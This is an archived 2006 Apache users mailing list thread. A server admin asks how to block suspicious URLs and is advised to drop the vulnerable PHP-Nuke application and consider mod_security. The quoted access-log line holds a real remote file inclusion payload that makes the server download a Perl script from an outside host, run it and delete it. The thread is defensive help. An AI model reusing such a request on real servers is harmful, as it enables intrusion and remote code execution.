httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "David Velayos" <dvela...@gmail.com>
Subject Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch
Date Tue, 08 Aug 2006 12:59:08 GMT
of course, this is not working, (you have to be authenticated to use this
page as an admin user), but it's a useless waste of bandwidth and i think
it's better deny the access by a common security mechanism before. The
question is that

So, with mod_security can i block supspicious urls with regexp?

2006/8/8, Joshua Slive <joshua@slive.ca>:
>
> On 8/7/06, david <dvelayos@gmail.com> wrote:
> > Hello!
> >
> > Recently, i've founded some entries on my apache webserver log like
> this:
> >
> > [IP] - - [05/Aug/2006:02:17:47 +0200] "GET
> > /nuke/index.php?config=1&base_datapath=
> http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20
> >%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
> > HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
> >
> > As you can see, some attacker tries to use the index.php file to get a
> > cmd.txt file from other site.
> >
> > are there any way to detect this urls to stop this configuring apache?
>
> If this is actually working on your server, you need to immediately
> get rid of the application that is allowing it (php-nuke it seems),
> since it has a major security flaw.
>
> In general, mod_security can be used to block suspicious URLs.  But it
> is not a substitute for making sure you only use secure web
> applications.
>
> Joshua.
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>    "   from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>

Mime
View raw message